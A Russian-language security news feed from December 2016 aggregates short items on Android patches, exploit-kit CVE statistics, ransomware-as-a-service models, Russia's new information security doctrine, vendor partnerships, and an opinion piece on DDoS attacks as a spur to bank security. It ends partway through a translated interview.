Новости мира информационной безопасности. Расследование и реагирование на инциденты. Кибербезопасность.

[ Цифровая криминалистика | Реагирование на инциденты ]

Новости информационной безопасности

IT & 
Security NewsFeed

Следующие 100 записей

Порядок информационного взаимодействия ФНС с органами Россельхознадзора в целях администрирования земельного налога


В настоящее время информационное взаимодействие между государственными органами используется всё активнее, и одним из лидеров здесь является Федеральная налоговая служба (ФНС), использующая разнообразные технологии взаимодействия.

На это раз ФНС в письме от 24 октября 2016 года № БС-4-21/20144@ направила своим территориальным управлениям (УФНС) типовой вариант соглашения о взаимодействии УФНС России по субъекту РФ с территориальным органом Федеральной службы по ветеринарному и фитосанитарному надзору (Россельхознадзор), уполномоченным на осуществление государственного земельного надзора за соблюдением требований, связанных с обязательным использованием земель сельскохозяйственного назначения, оборот которых регулируется федеральным законом от 24.07.2002 № 101-ФЗ, для ведения сельскохозяйственного производства или осуществления иной связанной с ним деятельности.

УФНС России по субъектам РФ поручается проработать вопрос о заключении новых или изменении существующих соглашений (используя за основу направленный вариант) и применения полученных в соответствии с ними сведений для налогового администрирования.

В тексте рекомендуемого соглашения предусмотрено, что УФНС предоставляет Управлению Россельхознадзора следующую общедоступную (не содержащую налоговую тайну) информацию в объеме, предусмотренном законодательством, необходимую для мероприятий по государственному земельному надзору (далее - мероприятия Госземнадзора) и для оценки эффективности их выполнения (4.1):

Управление Россельхознадзора предоставляет для мероприятий налогового контроля копии документов, составленных уполномоченными должностными лицами Управления Россельхознадзора (п.4.2):
Предоставление информации осуществляется УФНС с сопроводительным письмом в электронном виде (п.4.3).

В качестве приоритетных способов запроса сведений определены (п.4.4):
Копии документов Управлениями Россельхознадзора предоставляются в следующем порядке (п.4.6):
Передача документов (сопроводительных писем, копий документов и т.п.), предусмотренных соглашением, осуществляется сторонами курьером с подтверждением их получения, если иной способ доставки данных документов не предусмотрен законодательством или не указан в запросе заинтересованной стороны (п.5.4).

Источник: Консультант Плюс
http://www.consultant.ru/cons/cgi/online.cgi?req=doc;base=EXP;n=670568#0

orig: 2016-12-06 21:05:13 / http://rusrim.blogspot.com/2016/12/blog-post_7.html (click post title)



Flash Player остается главной мишенью эксплойтов

Наиболее распространенные уязвимости, эксплуатируемые в эксплоитах затрагивают такие продукты как Flash Player, Windows, Internet Explorer и Silverlight. В докладе Recorded Future за 2015 год говорится о том, что бреши в Flash Player занимают 8 позиций из 10 самых используемых уязвимостей в эксплоитах. В этом году Flash-уязвимости занимают 6 позиций из 10.

Фирма Recorded Future проанализировали 141 набор эксплоитов и пришли к выводу, что брешь в Internet Explorer, идентифицируемая как CVE-2016-0189 наиболее часто упоминалась на форумах и в блогах по информационной безопасности. Эта уязвимость использовалась в атаках прежде чем Microsoftinfo-icon выпустили обновления. Но даже после выпуска патча эксплуатация этой бреши была добавлена в такие популярные наборы эксплоитов как Sundown, Neutrino, RIG и Magnitude.

Уязвимость, эксплуатация которой была добавлена в наибольшее количество наборов эксплоитов представляет собой дыру в Flash Player под идентификатором CVE-2015-7645. В частности, она была интегрирована в Neutrino, Angler, Magnitude, RIG, Nuclear, Spartan и Hunter.

Исследователи полагают, что популярность этой бреши обусловлена тем, что она затрагивает все популярные операционные системы.

Также в популярные наборы эксплоитов вошли следующие уязвимости в Flash: CVE-2016-1019, CVE-2016-4117, CVE-2015-8651 и обнаруженная Лабораторией Касперского в ноябре 2015 года брешь в Silverlight.

orig: 2016-12-06 20:42:18 / https://www.anti-malware.ru/news/2016-12-06/21637 (click post title)



Unrestricted Backend Login Method Seen in OpenCart

Unrestricted Backend Login Method Seen in OpenCart

From the attacker’s perspective, creating ways to maintain access to a compromised website is desirable. This allows them to further distribute malware and perform different kinds of malicious activities.

One of the ways attackers try to secure their access is by adding admin users, or pieces of malicious code throughout the site. This allows them to regain access easily, if needed. However, we recently found a unique way to achieve this kind of breach.

Continue reading Unrestricted Backend Login Method Seen in OpenCart at Sucuri Blog.

orig: 2016-12-06 18:30:53 / http://feedproxy.google.com/~r/sucuri/blog/~3/vQumOnLbxcQ/unrestricted-backend-login.html (click post title)



Чем полезен DDOS

В последнее время то и дело пишут о различных DDOS-атаках на сайты крупных федеральных банков. Казалось бы, очевидна мысль, что это плохо, незаконно и только всем вредит. Однако я хочу на данное обстоятельство взглянуть совершенно с другой стороны. Если что-то происходит, значит это кому-нибудь нужно. Смотрите, в наше время заказать DDOS-атаку не так уж и сложно – были бы деньги. Для этого нужно найти на специализированных хакерских форумах подобные предложения. Меня больше интересует, кому это может быть нужно из нашей «песочницы». И ответ приходит на ум тут же. Интеграторам, кому же еще. Объясняю свою мысль с красной строки.

Есть жизненная русская пословица «Пока гром не грянет, мужик не перекрестится». Я уже около десяти лет работаю в различных финансовых учреждениях. Как вы думаете, где-нибудь серьезно относились к защите интернет банков? Да, относились, но преимущественно в части устранения критичных уязвимостей по результатам сканов, что нужно для получения соответствия стандарту PCIDSS. Но это было никак не для обеспечения защиты от распределенных атак. А вот к мобильным приложениям точно нет. Знаю банк, входящий в ТОП-50, в котором мобильное приложение скорее отсутствует, чем его работоспособность можно назвать работой. А надежность интернет-банка тоже оставляет желать лучшего. Есть и другие банки.

Сегодня РБК пишет о том, что тема ДБО подвергнется регулированию. Что будут разработаны требования, стандарты, будет проводиться сертификация. Это всё замечательно. Наверняка все это будет делаться за счет банков, а точнее за счет клиентов этих самых банков. А кто будет писать эти самые стандарты? Рабочие группы они же комитеты из заинтересованных лиц либо на добровольной основе. Но скорее всего это доверят как обычно какому-нибудь интегратору. Кто будет проводить работы по анализу программного кода, по внешнему аудиту под сертификацию? Опять интеграторы. А может еще и сами решения, предлагаемые вендорами на рынке должны подвергнуться сертификации? Кто будет их сертифицировать? Опять эти же самые интеграторы.

Наконец, я хочу выразить свою мысль хорошо ли это или плохо? На мой взгляд, хорошо. Обратимся опять к этой же народной пословице «Пока гром не грянет, мужик не перекрестится». Стало быть, мы - клиенты банков, а по сути, общество - станем пользоваться защищенными ДБО, а значит, безопасность наших финансов только возрастет. Можно сказать несколько громче – значит, это будет угодно обществу. Значит, любое вмешательство извне позволяет залатать бреши в безопасности, а значит это полезно. Мы же знаем, что атака вирусов и прочих биологических существ выявляет слабые нежизнеспособные особи и не дает им жить и размножаться. Так же и в нашей информационной безопасности.


Вся заметка «imho». Если у кого есть иные точки зрения на эту проблему, я приглашаю к дискуссии.

orig: 2016-12-06 17:37:00 / http://shaurojen.blogspot.com/2016/12/ddos.html (click post title)



Android окончательно расстался с Dirty Cow

Уязвимость, именуемая Dirty Cow, существовала в Linux около десяти лет. В октябре она была пропатчена в ядре Linux и дистрибутивах, однако заплатку для Android пользователям пришлось ждать более месяца.

Вчера Google выпустила очередной и последний в этом году набор обновлений для Android, включив в него патч для CVE-2016-5195. Помимо Dirty Cow, он устраняет еще 10 критических уязвимостей – по состоянию на 5 декабря. Анонсирован также неполный набор, на 1 декабря, в который включены заплатки для 10 брешей высокой степени опасности.

Напомним, патч для Dirty Cow вышел в составе новых прошивок для Nexus и Pixel в прошлом месяце, однако это обновление Google предложила как дополнительное. Ныне наличие этого патча стало официальным требованием для партнеров компании, из которых его пока раздала лишь Samsung.

Другая ныне закрываемая критическая уязвимость в подсистеме ядра, CVE-2016-4794, актуальна лишь для Pixel модификаций C и XL. Как и Dirty Cow, она позволяет повысить привилегии на устройстве до root.

Еще шесть критических брешей залатаны в драйверах графического процессора и видеокарты от NVIDIA. Уязвимость в драйвере GPU актуальна лишь для Nexus 9, в драйвере видеокарты – также для Pixel C. Все эти патчи, согласно Google, не доступны публично, а включены в новейший набор бинарных драйверов для ее устройств.

Пропатчены также два критических бага повышения привилегий в драйвере графической подсистемы ION и ряд уязвимостей, чреватых исполнением кода, в компонентах Qualcomm. «Уязвимость повышения привилегий в интерфейсе Qualcomm MSM позволяет локальному вредоносному приложению выполнить произвольный код в контексте ядра», – сказано в бюллетене Google.

Полный набор патчей (по состоянию на 5 декабря) устраняет также ряд уязвимостей высокой степени опасности, в том числе в ядре, файловой системе ядра, драйвере аудио-кодека HTC, драйверах MediaTek, кодеках и драйверах Qualcomm, а также в драйверах NVIDIA. В основной своей массе это баги повышения привилегий.

Неполный набор (уровня 1 декабря) включает патчи для уязвимостей удаленного исполнения кода, затрагивающих библиотеки CURL и LIBCURL. «Наиболее серьезная из уязвимостей позволяет атакующему, занявшему позицию ‘человек посередине’, использовать поддельный сертификат для исполнения произвольного кода в контексте привилегированного процесса, – пишет Google. – Эта проблема оценена как высокой опасности, так как для атаки нужен поддельный сертификат».

Остальные бреши высокой степени опасности, закрываемые набором от 1 декабря, были обнаружены в компонентах libziparchive, Mediaserver, Framesequence и Telephony.

orig: 2016-12-06 16:04:48 / https://threatpost.ru/dirty-cow-vulnerability-patched-in-android-security-bulletin/19509/ (click post title)



ИнфоТеКС и Киберника представили защищенный корпоративный мессенджер

Компания ИнфоТеКС и компания «Киберника» заключили партнерское соглашение. В рамках сотрудничества компании представят совместное решение — многофункциональную систему связи с сертифицированной криптографической защитой данных, разработанной компанией ИнфоТеКС.

В основу совместного решения легли флагманские продукты двух российский разработчиков: корпоративный мессенджер «Сибрус» компании «Киберника» и программный комплекс ViPNetClient компании ИнфоТеКС. Оба продукта включены в Единый реестр российских программ для электронных вычислительных машин и баз данных Минкомсвязи РФ.

Система ViPNetClient создает защищенную сеть, в которой работает мессенджер «Сибрус». Все коммуникации и взаимодействие пользователей в мессенджере осуществляются по зашифрованному каналу с сертифицированной криптографической защитой.Решение поддерживает групповые чаты с возможностью обмена любыми типами файлов, аудио- и видеозвонки, конференц-связь. Также для совместной работы в мессенджере предусмотрен менеджер задач и органайзер, позволяющий планировать встречи с коллегами.

Решение будет представлять большой интерес для государственных и коммерческих организаций, работающих с сертифицированными программными продуктами. «Сибрус» и ViPNetClient поддерживают основные настольные и мобильные платформы: Windows, MacOS, Linux, Androidinfo-icon и iOS.

«Несмотря на бурное развитие технологий, бизнесмены и госслужащие до сих пор используют в работе разрозненные и незащищенные каналы коммуникаций, общаясь по мобильной связи и в публичных приложениях, которые едва ли можно назвать надежными. — рассказал директор по технологиям компании «Киберника» Евгений Сидоров. — Совместно с нашим партнером мы предоставляем компаниям отечественное решение, которое позволит заказчику выстроить удобные коммуникации с сертифицированной защитой».

«Сотрудничество двух российских компаний позволит создать высокотехнологичное решение для защиты корпоративных коммуникаций, которое будет отвечать всем самым жестким требованиям, предъявляемым к мессенджерам как пользователями, так и нашим законодательством», — рассказал заместитель генерального директора компании ИнфоТеКС Дмитрий Гусев».

Добавим, что в октябре 2016 года корпоративный мессенджер «Сибрус» вошел в число полуфиналистов проекта-конкурса Института развития интернета (ИРИ) «Государственный мессенджер».

На следующем этапе конкурса выбранные экспертной группой разработки будут проходить тестирование в нескольких субъектах России, в структурах Федеральной службы судебных приставов и Федерального агентства по делам молодежи, а также на предприятии «Почта России». «Сибрус», в свою очередь, пройдет тестирование в Республике Удмуртия. По результатам пилотных проектов определятся несколько финалистов, которые займутся разработкой госмессенджера.

orig: 2016-12-06 14:55:47 / https://www.anti-malware.ru/news/2016-12-06/21635 (click post title)



Встречаем новую Доктрину информационной безопасности России. Что изменилось?

Вчера (5 декабря 2016 года) наконец-то утвердили обновленную Доктрину информационной безопасности Российской Федерации (вот ссылка на текст). Напомню, что старая версия документа была аж от 2000 года, и к настоящему моменту она, конечно же, устарела. Странно, что итоговый вариант существенно отличается от обсуждаемого ранее проекта, но ладно...
На мой взгляд, документ получился довольно толковый и лаконичный (всего 16 страниц), но скорее получил лишь косметические правки. К сожалению, документом пользоваться не очень удобно, отдельные темы (импортозамещение, защита КИИ, реагирование на инциденты и пр.) размазаны, важные положения необходимо собирать...
При первом прочтении документа обратил внимание вот на что (в сравнении с редакцией 2000 года):

1. Обновили термины
Поменялся (расширился) базовый термин "информационная безопасность РФ".
Было: Под информационной безопасностью Российской Федерации понимается состояние защищенности ее национальных интересов в информационной сфере, определяющихся совокупностью сбалансированных интересов личности, общества и государства.Стало: Информационная безопасность Российской Федерации - состояние защищенности личности, общества и государства от внутренних и внешних информационных угроз, при котором обеспечивается реализация конституционных прав и свобод человека и гражданина, достойные качество у уровень жизни граждан, суверенитет, территориальная целостность и устойчивое социально-экономическое развитие Российской Федерации, оборона и безопасность государства.  Все термины даже выделили в отдельный пункт, и дают определения следующим понятиям: "национальные интересы Российской Федерации в информационной сфере", "угроза информационной безопасности Российской Федерации", "информационная безопасность Российской Федерации", "обеспечение информационной безопасности", "силы обеспечения информационной безопасности", "средства обеспечения информационной безопасности", "система обеспечения информационной безопасности", "информационная инфраструктура Российской Федерации".

2. Появилось про безопасность критической информационной инфраструктуры (КИИ), и стали говорить про необходимость ее бесперебойного функционирования
Теперь про КИИ говорят в явном виде, но конкретики мало. Хотелось, конечно, услышать про ГосСОПКА, но есть лишь ее отголоски:23. Основными направлениями обеспечения информационной безопасности в области государственной и общественной безопасности являются:
...
в) повышение защищенности критической информационной инфраструктуры и устойчивости ее функционирования, развитие механизмов обнаружения и предупреждения информационных угроз и ликвидации последствий их проявления, повышение защищенности граждан и территорий от последствий чрезвычайных ситуаций, вызванных информационно-техническим воздействием на объекты критической информационной инфраструктуры;
г) повышение безопасности функционирования объектов информационной инфраструктуры, в том числе в целях обеспечения устойчивого взаимодействия государственных органов, недопущения иностранного контроля за функционированием таких объектов, обеспечение целостности, устойчивости функционирования и безопасности единой сети электросвязи Российской Федерации, а также обеспечение безопасности информации, передаваемой по ней и обрабатываемой в информационных системах на территории Российской Федерации;Отдельно упоминают про российский сегмент сети Интернет:29. Основными направлениями обеспечения информационной безопасности в области стратегической стабильности и равноправного стратегического партнерства являются:...
д) развитие национальной системы управления российским сегментом сети "Интернет".
3. Много, очень много говорят про информационно-психологическое воздействие
Упоминают про необходимость  "доведения до российской и международной общественности достоверной информации о государственной политике", акцентируют внимание на "масштабах использования средств оказания информационно-психологического воздействия, направленного на дестабилизацию внутриполитической и социальной ситуации" и "направленного на подрыв исторических основ и патриотических традиций, связанных с защитой Отечества", пишут про "тенденции к увеличению в зарубежных средствах массовой информации объема материалов, содержащих предвзятую оценку государственной политики", опасаются "размывания традиционных российских духовно-нравственных ценностей". Вопросы конечно же важные и правильные, про них упоминали и в старой редакции, но что-то уж слишком много про это...

4. Акцентируют внимание на обеспечении ИБ в кредитно-финансовой сфере
А еще и ПДн упоминают:14. Возрастают масштабы компьютерной преступности, прежде всего в кредитно-финансовой сфере, увеличивается число преступлений, связанных с нарушением конституционных прав и свобод человека и гражданина, в том числе в части, касающейся неприкосновенности частной жизни, личной и семейной тайны, при обработке персональных данных с использованием информационных технологий. При этом методы, способы и средства совершения таких преступлений становятся все изощреннее.
5. Говорят про проблему внедрения ИТ без учета вопросов ИБПри этом практика внедрения информационных технологий без увязки с обеспечением информационной безопасности существенно повышает вероятность проявления информационных угроз.Это, к сожалению происходит часто...

6. Ожидаемо много текста про импортозамещение. 
Про это напишу отдельную заметку с цитатами.

7. Развитие услуг по ИБ стало национальным приоритетом
8. Национальными интересами в информационной сфере являются:
...
в) развитие в Российской Федерации отрасли информационных технологий и электронной промышленности, а также совершенствование деятельности производственных, научных и научно-технических организаций по разработке, производству и эксплуатации средств обеспечения информационной безопасности, оказанию услуг в области обеспечения информационной безопасности;Привет, консалтинг и аутсорсинг!


8. Наконец-то стали говорить про профилактику и противодействие преступности
23. Основными направлениями обеспечения информационной безопасности в области государственной и общественной безопасности являются:...e) повышение эффективности профилактики правонарушений, совершаемых с использованием информационных технологий, и противодействия таким правонарушениям;
Это пока лишь первичный анализ итогового документа, изучу его внимательнее...


P.S. Кстати, дал интервью по теме для телеканала "Дождь":

orig: 2016-12-06 14:00:53 / http://80na20.blogspot.com/2016/12/blog-post_6.html (click post title)



Серия бесплатных вебинаров от партнера Microsoft — УЦ «Специалист»

excel

Бесплатный вебинар «Бизнес-анализ в Excel 2016/2013/2010»

10 декабря 2016 года центр компьютерного обучения «Специалист» при МГТУ имени Н.Э. Баумана проведёт бесплатный вебинар «Бизнес-анализ в Excel 2016/2013/2010». Приглашаем начинающих и продвинутых пользователей MS Excel, а также всех, кто желает улучшить свои навыки работы в программе!

Регистрация

 

Бесплатный вебинар «Применение логических функций в Excel. Часть 1. Функция ЕСЛИ»

10 декабря 2016 года центр компьютерного обучения «Специалист» при МГТУ имени Н.Э. Баумана проведёт бесплатный вебинар «Применение логических функций в Excel. Часть 1. Функция ЕСЛИ». Семинар открывает серию занятий, посвященных логическим функциям в Excel. Преподаватель — Сидорова Елена Владимировна.

Регистрация

 

Бесплатный вебинар «Формат ячеек: стандартные, собственные и условные форматирования в Excel»

12 декабря 2016 года в центре компьютерного обучения «Специалист» при МГТУ имени Н.Э. Баумана пройдет бесплатный вебинар «Формат ячеек: стандартные, собственные и условные форматирования в Excel». Приглашаем всех пользователей MS Excel, желающих улучшить свои навыки работы в программе.

Регистрация

orig: 2016-12-06 13:33:47 / https://blogs.technet.microsoft.com/rutechnews/2016/12/06/webinars-excel/ (click post title)



Google исправила уязвимости в Android

Google выпустила обновление для Android под названием Android Security Bulletin—December 2016, которое исправляет в этой ОС множественные уязвимости, а также уязвимости в ее сторонних компонентах производства NVIDIA, MediaTek, HTC и Qualcomm. Например, в компоненте драйвера звукового кодека HTC было исправлено три уязвимости типа Local Privilege Escalation (LPE), которые могут быть использованы атакующими для запуска вредоносного кода в режиме ядра Android. Исправлению подлежат устройства Google Nexus 9.

Нужно отметить, что в этот раз не было исправлено ни одной критической уязвимости в Android, которая могла быть использована для удаленного исполнения кода с повышенными привилегиями, например, с использованием печального компонента Mediaserver, отвечающего за обработку мультимедийных файлов.

В то же время, обновление закрывает ряд критических LPE уязвимостей в ядре и его компонентах. Эти уязвимости указаны ниже в таблице и получили статус Critical по той причине, что могут быть использованы для установки на устройство вредоносного кода с максимальными правами root, что, в свою очередь, может привести к перепрошивке устройства (reflashing) для полного удаления этого кода.

Среди критических LPE уязвимостей в ядре Android, две из них с идентификаторами CVE-2016-4794 и CVE-2016-5195 присутствуют в диспетчере виртуальной памяти ядра. При этом атакующий может локально запустить в Android эксплойт и установить на устройстве код с правами root, что может повлечь перепрошивку устройства для его удаления. Обновлению подлежат смартфоны Pixel C, Pixel, Pixel XL, Nexus 5X, Nexus 6, Nexus 6P, Nexus 9, Android One, Nexus Player.

Схожие LPE уязвимости присутствуют в видео-драйвере NVIDIA и позволяют злоумышленниками осуществить рутинг устройства. Обновлению подлежат смартфоны Nexus 9 и Pixel C.

Samsung также порадовала своих пользователей обновлением Android, выпустив бюллетень SMR-DEC-2016. Большинство исправленных Samsung уязвимостей имеет статус важности Low и лишь несколько из них с идентификаторами SVE-2016-6978, SVE-2016-7661, SVE-2016-7662 (OMACP Security Issue), а также SVE-2016-7341 (Heap overflow in sensor driver) имеют тип Medium.

Мы рекомендуем пользователям обновить свои устройства под управлением Android.

image
be secure.

orig: 2016-12-06 13:02:14 / https://habrahabr.ru/post/316960/ (click post title)



Авторы вымогательского ПО изобретают новые способы заработка

Жесткая конкуренция на рынке вынуждает разработчиков шифровальщиков искать новые подходы к модели RaaS.

Атаки с использованием вымогательского ПО продолжают оставаться одной из основных киберугроз для пользователей. Успешные атаки приносят немалый доход операторам вымогателей. К примеру, в 2015 году создатели семейства CryptoWall смогли заработать внушительную сумму в $325 млн.

Высокая активность криптовымогателей частично может быть связана с ростом популярности бизнес-модели ransomware-as-a-service (RaaS – «вымогательское ПО как услуга»), в рамках которой авторы вредоносной программы предлагают процент от полученных денег за распространение вредоносного приложения. Как отмечают эксперты Trend Micro, для запуска вредоносных кампаний потенциальным дистрибьюторам вовсе необязательно иметь начальный капитал или уметь писать код.

Согласно данным недавнего исследования, с начала текущего года число новых семейств вымогателей возросло на 172%. Из-за жесткой конкуренции на рынке разработчики вымогательского ПО вынуждены изобретать новые подходы к модели RaaS.

К примеру, авторы шифровальщика Shark используют централизированную систему оплаты и оставляют себе только 20% от полученных выкупов. Остальные 80% средств получают операторы вредоноса. Таким образом разработчики привлекают людей, желающих заработать. Кроме того, вирусописатели предоставляют дистрибьюторам инструкции, позволяющие с легкостью модифицировать вредонос, а также предлагают советы о суммах выкупа в разных странах.

В свою очередь, разработчики вымогателя Stampado предлагают приобрести «пожизненную лицензию» всего за $39, тогда как стоимость других шифровальщиков, таких как Locky или Goliath, может составлять тысячи долларов. Предложение авторов Stampado рассчитано, в первую очередь, на клиентов с небольшим капиталом. По аналогии с Jigsaw вымогатель Stampado удаляет файлы по истечении определенного времени, стимулируя жертву выплатить выкуп, и использует алгоритм AES для шифрования контента. В отличие от Jigsaw Stampado не обладает сложным функционалом, и взломать его шифрование значительно проще.

orig: 2016-12-06 12:39:48 / http://www.securitylab.ru/news/484657.php (click post title)



Новая доктрина информационной безопасности России: главные положения

Операции с документом

Опубликовано: 06-12-2016 03:25

Президент Владимир Путин утвердил доктрину информационной безопасности. Ее основные положения — в обзоре РБК Документ состоит из 38 статей, разбитых на пять глав. Текст начинается с указания национальных интересов в сфере национальной безопасности. Далее идет перечисление основных информационных угроз в современном мире. На основании этих угроз формируются стратегические цели национальной политики, касающиеся экономики, военной сферы, дипломатии, науки и образования.

Новая доктрина информационной безопасности России: главные положения

Доктрина информационной безопасности РФ

Национальные интересы

Основные информационные угрозы

Подробнее на РБК:

http://www.rbc.ru/politics/06/12/2016/584693759a79472bbf7195f3

orig: 2016-12-06 12:25:26 / http://www.iso27000.ru/novosti-i-sobytiya/novaya-doktrina-informacionnoi-bezopasnosti-rossii-glavnye-polozheniya (click post title)



Nintendo заплатит до $20 тыс. за информацию об уязвимостях в 3DS

Производитель запустил собственную программу выплаты вознаграждений за сообщения об уязвимостях.

Программы выплаты вознаграждений исследователям, обнаружившим уязвимости в продуктах и сообщившим о них производителю, стремительно набирают популярность. К длинному списку компаний, поддерживающих инициативу «bug bounty», теперь добавилась Nintendo.

Программа реализуется при участии платформы HackerOne, сотрудничающей с такими компаниями, как «Лаборатория Касперского», Qualcomm и Uber, а также с Армией США в реализации проекта «Hack the Army». Пока что программа выплаты вознаграждения ограничивается лишь консолями Nintendo 3DS.

«В настоящее время в контексте программы HackerOne компанию Nintendo интересует информация об уязвимостях только в системах семейства Nintendo 3DS. Уязвимости в других платформах Nintendo, интернет-сервисе и серверах компанию не интересуют», - говорится в уведомлении на HackerOne.

За информацию об уязвимостях, позволяющих атакующим повысить свои привилегии на консолях на базе процессоров ARM11 и ARM 9, производитель готов выплатить от $100 до $20000. Каким образом будут оцениваться уязвимости, Nintendo не сообщает.

Для участия в программе необходимо представить PoC-код для эксплуатации уязвимости, а еще лучше – функциональный эксплоит. Тем не менее, компания готова рассмотреть сообщение о проблеме безопасности даже в отсутствие эксплоита. На его создание может уйти время, а Nintendo заинтересована как можно раньше узнать об уязвимостях в своих продуктах.

orig: 2016-12-06 12:25:16 / http://www.securitylab.ru/news/484656.php (click post title)



Утверждена доктрина информационной безопасности России

В доктрине информационной безопасности определены цели и направления обеспечения безопасности, учитывая интересы РФ

orig: 2016-12-06 12:21:10 / http://www.jetinfo.ru/news/?nid=0015f9964a43d5a2fb5f2b4b4ab519fa (click post title)



Solar Security и АСТ подписали партнерское соглашение

Компания Solar Securityinfo-icon, разработчик продуктов и сервисов для целевого мониторинга и оперативного управления информационной безопасностью, заключила соглашение о партнерстве с компанией «АСТ», многопрофильным системным интегратором.

«АСТ» работает на российском ИТ-рынке с 2002 года и стабильно входит в рейтинги крупнейших отечественных ИТ-компаний. Среди клиентов компании крупнейшие организации различных сфер деятельности – ФСТЭК России, ФТС России, «Ростелекомinfo-icon», «Мегафон», Yandex, GeneralElectric, ВТБ24, Альфа-Банк и многие другие.

Согласно заключенному соглашению, «АСТ» становится официальным партнером Solar Security и планирует продвигать всю линейку продуктов компании. Специалисты компании «АСТ» прошли обучение и получили статус Implement & Support по решениям SolarinRights и SolarDozor. Данный партнерский статус подтверждает компетенции интегратора по внедрению и технической поддержке продуктов и сервисов Solar Security.

«Одним из приоритетных направлений деятельности нашей компании является информационная безопасность. В рамках уже реализованных проектов мы не раз сталкивались с продуктами SolarSecurity и считаем их эффективными для решения целевых задач наших клиентов. Получив партнерский статус, мы сможем предложить заказчикам лучшие условия, экспертизу и сервис. В наших планах – развитие отношений с партнером, расширение проектного и экспертного опыта по его продуктам, что даст возможность обеспечивать полный цикл внедрения и поддержки по всем существующим и будущим разработкам Solar Security», – отметил технический директор «АСТ» Александр Марлов.

«Среди заказчиков «АСТ» большое количество федеральных и региональных органов государственной власти, предъявляющих крайне высокие требования к информационной безопасности, к продуктам и решениям, которые ее обеспечивают. Заключенное сегодня соглашение позволит обеим компаниям расширить свое присутствие в госсекторе, совместными усилиями повысить уровень защищенности российских государственных организаций», – говорит Денис Назаренко, руководитель отдела по работе с партнерами компании Solar Security.

orig: 2016-12-06 12:20:25 / https://www.anti-malware.ru/news/2016-12-06/21634 (click post title)



«СёрчИнформ» и ЦРТ представили решение для защиты информации, передаваемой голосом

Интеграция DLP-системы «Контур информационной безопасности Сёрчинформ» с разработкой ЦРТ позволяет автоматически распознавать речь, преобразовывать ее в текст и анализировать данные на предмет нарушения политик безопасности. Решение облегчает работу ИБ-специалистов, которым раньше приходилось самостоятельно прослушивать и анализировать подозрительные аудиофайлы.

«КИБ Сёрчинформ» обеспечивает контроль и запись разговоров пользователей, однако по записанным данным можно было осуществлять только атрибутный поиск, что делало невозможным определение содержания разговора без его прослушивания. При этом на прослушивание всех файлов ИБ-специалисты тратили значительное время и ресурсы.

Интеграция «КИБ СёрчИнформ» с решением ЦРТ позволяет автоматически распознавать речь в аудиозаписях и получать их текстовую расшифровку. По расшифрованным аудиозаписям DLP-система осуществляет текстовый поиск, а также проводит автоматические проверки по настроенным политикам безопасности.

«Решение ЦРТ позволяет получать качественный и быстрый результат, – отмечает технический директор «СёрчИнформ» Иван Мершков. – Несмотря на естественное «размытие» отдельных слов при произношении, технология распознает речь с минимальным процентом погрешностей. Важно и то, что для распознавания речи «КИБ СёрчИнформ» не использует внешние ресурсы. Процедура локальна и данные не покидают корпоративной сети, что гарантирует сохранность конфиденциальной информации».

«Наше совместное решение существенно упрощает и способствует повышению эффективности работы служб ИБ компаний.  Специалистам по безопасности больше не нужно анализировать записи лично – текстовую расшифровку делает беспристрастная машина, а человек вступает в игру лишь тогда, когда выявлена реальная опасность раскрытия коммерческой тайны или другой утечки ценной корпоративной информации», – комментирует директор по развитию компании ЦРТ Алексей Закревский.

В DLP-системе «КИБ СёрчИнформ» за последние два года были расширены возможности анализа разных типов данных. Так, пользователям системы стали доступны:

orig: 2016-12-06 12:06:23 / http://www.iso27000.ru/press-relizy/syorchinform-i-crt-predstavili-reshenie-dlya-zaschity-informacii-peredavaemoi-golosom (click post title)



SkyDNS вошел в рейтинг ТОП-25 лидеров российского рынка облачных технологий

В ежегодный рейтинг включается информация о ТОП-25 компаниях, предоставляющих ИТ-решения и услуги по облачной модели, а также о финансовых показателях этих компаний (http://bit.ly/2h5yFtn). 

Покупатели продуктов и сервисов SkyDNS в очередной раз получили подтверждение, что пользуются решениями, разработанными лидером в своей сфере и, что не менее важно, одним из ведущих игроков российского рынка Software as a Service (SaaS). К тому же, еще одной гарантией качества и свидетельством отечественного происхождения разработок SkyDNS служит тот факт, что все они входят в единый реестр российского ПО. При работе с такой компанией клиенты значительно снижают риски покупки непроверенных технологических решений, которые иногда представляют собой "кота в мешке". 

Облачная инфраструктура SkyDNS включает в себя сеть серверов DNS-фильтрации, расположенных в стратегически важных точках РФ и обрабатывающих до 1 млрд запросов ежедневно. Это позволяет равномерно распределять нагрузку и обеспечивает отказоустойчивость сервиса. Благодаря широкой линейке продуктов и сервисов SkyDNS практически для всех сегментов рынка любой потенциальный клиент найдет подходящее именно ему облачное решение. 

orig: 2016-12-06 12:04:38 / http://www.iso27000.ru/press-relizy/skydns-voshel-v-reiting-top-25-liderov-rossiiskogo-rynka-oblachnyh-tehnologii (click post title)



[Перевод] Рихард Цвиненберг (AMTSO): “Киберпреступность не имеет границ, но мы застряли с национальными законами…»

Наше сегодняшнее интервью с Рихардом Цвиненбергом (разработчиком одного из первых в мире антивирусов), который в мире ИТ-безопасности уже с конца 80-х годов, а начал «играть» с компьютерами еще в 70-х годах прошлого века.

Луис Корронс (Л.К.): В начале компьютерные вирусы были почти как миф. Однако со временем компьютерные атаки стали реальностью, и они значительно эволюционировали вместе с решениями безопасности. Насколько правильно мы все делаем? Похоже, что сегодня наблюдается намного больше атак, чем когда-либо ранее…

Рихард Цвиненберг (Р.Ц.): Очевидно, что атак стало больше, чем раньше. В самом начале наличие компьютера было в диковинку, вдобавок к этому, базовая операционная система была весьма разнообразна. В наши дни почти каждый человек имеет один или несколько компьютеров или устройств. Чем больше устройств, тем более интересные векторы атак (у кибер-преступников больше шансов на успех). Раз сейчас больше людей используют компьютеры, то автоматически стало больше людей, которые воспользуются этим в каких-то вредоносных целях. Это неизбежно. Как и в бизнесе, где есть возможности, там появляются предприниматели, так и в кибер-преступности: если можно воспользоваться какими-то уязвимостями, то кто-нибудь это сделает.

За ростом и развитием операционной системы следуют и решения безопасности. На самом деле, даже не только решения безопасности, но и также общие представления людей о безопасности. Возможно, банковские трояны и шифровальщики стали полезны для того, чтобы повысить осведомленность людей.

Л.К.: Вы разработали свой первый антивирус в 1988 году. Тогда количество вирусов, которые требовалось обнаруживать, было ничтожно малым, несмотря на то, что уже тогда они использовали некоторые действительно сложные техники. Учитывая развитие компьютерных угроз, есть ли у кого-то сегодня возможность самому разработать эффективное решение безопасности?

